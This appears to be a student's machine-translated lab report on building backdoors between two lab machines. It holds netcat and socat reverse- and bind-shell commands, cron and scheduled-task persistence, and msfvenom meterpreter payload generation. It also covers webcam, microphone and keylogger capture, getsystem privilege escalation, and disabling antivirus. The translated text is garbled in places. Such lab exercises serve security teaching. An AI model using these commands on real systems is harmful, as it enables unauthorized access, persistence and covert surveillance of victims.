table of Contents
First, content description and experimental basic questions answered
Second, the tools to prepare
- View WindowsIP and LinuxIP
- Windows get Linuxshell
- Linux get Windows shell
- Transmitting data using nc
Third, the experimental process
- Use netcat get the host operating Shell, cron start
- Use socat get the host operating Shell, plans to start the task
- Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
- Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
- Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
Fourth, the problem with thinking
First, content description and experimental basic questions answered
1, the content of the experiment
(1) using the acquired host operating netcat Shell, cron start (0.5 min)
(2) use socat get the host operating Shell, plans to launch the task (0.5 points)
(3) using the MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and runs a host acquires Shell (0.5 min)
(4) using the MSF meterpreter (or other software) to generate the target host acquires audio content, the camera, and the like recording keystrokes, and try to provide the right (2 minutes)
(5) plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell (1 min) plus the contents of this experiment together written report.
2, basic questions answered
(1) include a back door you can think of possible ways to enter your system?
- Linux computer account password hack
- Replace login program that provides special password Invisible Sign
- Hidden back door in the file system
(2) How do you know exemplified by the back door to start up (win and linux) way?
- Linux: crontab function by the Trojans to start the timer, the control panel will be able to maintain the status monitor periodically start the back door, it can also bind to normal healthy then injected shellcode open the back door.
- win: passive acceptance of backdoors or download, when the injured party click to run the backdoor program starts.
Which gives you a profound image function (3) Meterpreter there?
- Basic functions (basic connectivity, executing instructions)
- Extensions (such as collecting user information, installation services and other functions)
(4) How to find yourself the system has not been installed back door?
- Install antivirus software: for real-time protection.
- Detect network connection: Check for IP to establish a connection with the machine.
(5) back door concept
The back door is not accessible through the normal certification process and channel system.
** Where does the back door?
- The compiler leave the back door
- Operating system to stay back door
- The most common application of course leave the back door
- There is lurking in the operating system or disguised backdoors dedicated for a specific application.
Here are some examples of recent years:
- Compiler: Apple Xcode back door event . Apple Xcode event caught the back door of APP include: micro-channel, Netease cloud music, travel pieces, etc. 12306 76 software, affecting hundreds of millions of users.
- Operating System: VS government vendors . Apple refused to open the back door of the FBI requirements set requirements. Those who did not refuse, of course, can not speak.
- Operating system: depth interpretation of the MS14-068 vulnerability: Microsoft orchestrated by the back door? . In fact, the details I did not understand too, see it quite suspicious.
- Firmware: More Cisco routers found the back door: China has four
- Application: The researchers found macOS version of Skype built-in back door
- Application: see the bottom line of corporate ethics Gustafsson from "back door" event
- Applications: How to evaluate cloud platform exposed vulnerabilities exist WormHole Baidu's backdoor variety of App?
A relatively narrow little back door concept:
- Especially lurking in the operating system designed to do a backdoor program
- "Bad guys" can be connected to this program
- Remote execute various commands
- The concept and Trojans overlap
- First of all we have to have such a program
- netcat series
- meter preternatural
- intersect
- Particularly ...
- Second, get into the system
- Genuine software attacks or deliberately, contains backdoor
- Genuine library file contains backdoor
- Essentially, the trick you need to download the operation, it belongs to all kinds of fishing
- Installation package contains the back door, put online for download
- Bound to a specific file, put online for download
- Malicious programs sent directly to you
- Send direct link to your phishing attack, a malicious website stallion
- Picked up a U disk, open a file to see?
- Coal female handsome pot take U disk directly copy to you
- System vulnerabilities to attack, after acquiring control, install a backdoor
- Have up and running again
- Boot from the start technology
- win the regular tasks
- The linux cron
- Disguised as common software, entice users to click
- Trojanized normal software
- Last not have malicious code detection program found in native
- Malicious code to avoid killing technology
- Firewall can not be found on this machine or network
- Rebound connection
- Encrypted connection
- Tunneling
(6) Common backdoor
-
netcat
- Also known as nc, ncat
- http://nc110.sourceforge.net/
- http://netcat.sourceforge.net/
It is a bottom tool, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.
- Linux: general comes with netcat, "man netcat" or "man nc" to see the instructions for its use
- Windows: Course Home accessories download ncat.rar extract can be used!
Second, the tools to prepare
1 Use netcat or nc obtain remote host Shell
1.1 Windows to get Linux Shell
1.Windows open listening
- With a
ipconfig
view Native IP command192.168.157.1
:
- Download ncat and enter the directory, press the
windows + R
key combination to open cmd.exe, enterncat.exe -l -p 5236
the command:
- Then Windows Firewall alarm! In order to achieve the purpose of the experiment , here on the first computer antivirus software and Windows Firewall temporarily closed :
2.Linux rebound in connection Win, enter the command nc 192.168.157.1 5236 -e /bin/sh
:
Get the next 3.Windows linux shell, any command can be run, such as ls:
1.2 Linux get Win Shell
1. ifconfig
Check local IP command 192.168.157.132
:
2.Linux run monitor command, enter the commandnc -l -p 5236
3.Windows rebound connect Linux, enter the command in the ncat catalog ncat.exe -e cmd.exe 192.168.157.132 5236
:
See the Windows command prompt 4.Linux
5. You can enjoy the view and manipulate files on Windows ha ha ha!
2 to transmit data using nc
-
A command transmission format file with the nc are as follows:
The destination host listening:
nc -l listening port> To receive the file name
Source host initiates a request:
nc destination host ip destination port
-
English is described as follows:
Start by using nc to listen on a specific port, with output captured into a file:
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:
$ nc host.example.com 1234 < filename.in
After the file has been transferred, the connection will close automatically.
-
Windows monitor
5224
port -
Under Kali is connected to a Windows
5224
port -
Establishing a data transmission connection
Third, the experimental process
Use netcat get the host operating Shell, cron start
-
In Windows monitor
5236
port -
In kali, washed with
crontab -e
edit a scheduled task, select the editor3
-
Add a line at the end
24 * * * * /bin/netcat 192.168.157.1 5236 -e /bin/sh
, which means the reverse connection of Windows hosts in the 24th minute of every hour5236
port
-
22:24 time to time, have been obtained in the shell kali, commands can be entered
Use socat get the host operating Shell, plans to start the task
Shocked
Netcat ++, super netcat tool.
Do not believe? To look up the README .
windows version, see attachment . Decompression that is used, do not install.
Any agency, forwarding and other functions can be realized with the tool.
-
With the
man socat
command to view thesocat
presentation and related usage:DESCRIPTION
**Socat** is a command line based utility that establishes two bidirec‐ tional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many dif‐ ferent purposes.
**Filan** is a utility that prints information about its active file descriptors to stdout. It has been written for debugging **socat**, but might be useful for other purposes too. Use the -h option to find more infos.
**Procan** is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging **socat**, but might be useful for other pur‐ poses too.
The life cycle of a **socat** instance typically consists of four phases.
In the init phase, the command line options are parsed and logging is initialized.
During the open phase, **socat** opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.
In the transfer phase, **socat** watches both streams’ read and write file descriptors via select() , and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.
When one of the streams effectively reaches EOF, the closing phase begins. **Socat** transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to termi‐ nate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and termi‐ nates.
- In win10 system, right-click the bottom left corner of the screen windows icon, select "Computer Management" (or simply search for "Computer Management")
-
Create a task in Task Scheduler, fill in the name of the task (school)
- Click the
触发器
tab, select新建
, and then begin the task set工作站锁定时
: -
Click the
操作
tab, click新建
, programs, or scripts, selectsocat.exe
the path, add a column to write parameterstcp-listen:5236 exec:cmd.exe,pty,stderr
(function is tocmd.exe
bind to the port5236
, while thecmd.exe
the redirect stderr to stdout), click确定
Save Settings:
-
Once created, the discovery task is ready, press the Windows + L shortcut key to lock your computer when you open again, find the task you created, double-click, you can create a discovery task before the run has begun
-
At this point, enter the command in Kali environment
socat - tcp:192.168.157.1:5236
, the first argument here-
represent the standard input and output, the second stream to port Windows 5236 host, can be found at this time has successfully obtained a cmd shell
MSF meterpreter using an executable file using ncat socat or transferred to the host and the host operating acquired Shell
meter Preter
- Is a backdoor program.
- The traditional understanding is: someone to write a backdoor, we make use of them.
- Later, some cattle do, wanted to write a platform to generate backdoors. This platform does, the back door
基本功能(基本的连接、执行指令)
,扩展功能(如搜集用户信息、安装服务等功能)
,编码模式
,运行平台
,- as well as
运行参数
- Part or all made adjustable parameters. When used in combination as needed, you can generate an executable file.
Typical platform will include:
- intersect
- Metaspolit of msfvenom instructions
- Veil-evasion
We next learn how to use the back door msfenom generate an executable file. We want to generate this backdoor is Meterpreter.
Meterpreter uncover the mystery describes some of the underlying principles of meterpreter of ???.
- Input command
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exe
generating backdoor
Note The IP address is LinuxIP
Parameter Description:
-p use of payload. payload translated as payload, is to be transported something. Here windows / meterpreter / reverse_tcp is a piece of shellcode
-X executable file template to use, payload (shellcode) is written to the executable file
-e encoder used, for shellcode deformation, in order to avoid killing
-I iterations encoder. I.e., as encoded using the encoder 5
-b badchar payload is to be removed in character
LHOST is connected IP bounce back
LPORT is connected back to port
Type of -f Makefile
> Output file to which
** Of course, the generated files need to ncat
copied to the Windows command in the (of course, most likely anti-virus software will alarm and delete the file, because it is a back door thing. So in order to verify the co-feature, you can temporarily turn off anti-virus software for a while. Later we will be mentioned to avoid killing, finished back door to avoid killing anti-virus software will not be found)
- The next Windows entry into the receiving mode
ncat.exe -lv 5236
>
20175236_backdoor.exe,
-
Linux executed
nc 192.168.157.1 5236 < 20175236_backdoor.exe,
Note Closing the virus killing softwareThe IP address of the host that is WindowsIP
-
Successfully transmitting and receiving files
- Kali open terminal, enter
msfconsole
commands into the console msf
-
Enter
use exploit/multi/handler
into the monitor module -
Input
set payload windows/meterpreter/reverse_tcp
settings payload -
Sequentially inputted
set LHOST 192.168.182.128
andset LPORT 5224
set the IP and portNote that at this time when the specified IP address LinuxIP, and generates the same IP backdoor
-
Setup is complete, start listening
exploit
-
Backdoor running under Windows
-
kali has received Windows host connection, remote control and get the shell
Description:
- LHOST needs and the step of generating backdoor.exe consistent, i.e., in the present embodiment
192.168.157.132
; - LPORT also requires the previous step and generating backdoor.exe consistent, i.e.
5236
; - payload should be consistent, that is
windows/meterpreter/reverse_tcp
.
MSF meterpreter acquire the content using the destination host generates audio, camera, records keystrokes
-
Use
record_mic
instructions can intercept an audio -
Use
webcam_snap
instructions may use the camera to take pictures (I ugly, not added a sticker on the mirror) -
Use
screenshot
instructions can be screen shots (type instruction forget shots, but can see a screenshot of the generated files) -
Using
keyscan_start
an instruction to start recording the keystrokes using thekeyscan_dump
instruction to read the recorded keystrokes - First use
getuid
command to view the current user, and then use thegetsystem
instructions mention the right
Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
-
Use the command
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.132 LPORT=5236 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5236pwn
to generate a template to pwn1 this elf file format shellcode file 5236pwn
- Input command
msfconsole
into the command line msf - Run the backdoor file 5236pwn on kali,
在kali中执行pwn2时应先加权限 chmod +x 5236pwn
- At this point the attacker Linux has gained connected attacker Linux, and get a shell on the remote control
Fourth, the problem with thinking
I feel that this experiment is not generally difficult, compared to the first experiment to experiment a lot of familiar environment, it is also relatively easy to do, is learning task recently made many and as varied a bit messy, time allocation caused by an irrational test report the quality is not high. But in general this experiment can be summarized in four words: really fun! I felt establish a backdoor connection is so simple, yet so powerful function, experimental process still quite rewarding. Of course, CSDN also learned some other things, such as Meterpreter's much more than what I think of as a single, CSDN reference on someone else's blog to learn a meterpreter some other related knowledge:
With the help
command to view meterpreter basic functions:
Get Windows command line interface, Windows built-in features to facilitate the execution of instructions, exit Exit: get ruby interface, exit to exit. If you row, you can even be programmed directly with ruby (PS: I will not, so do not say)
It is said that you can call any windows API. Refer to "Metasploit devil training camp" Chapter IX, there is a small example.
There are many things to learn, "confidential no small matter"! More understanding through this hands-on to the low capacity of some systems to prevent the invasion of the fact that such a simple backdoor shocking, thereby indirectly increase their security awareness.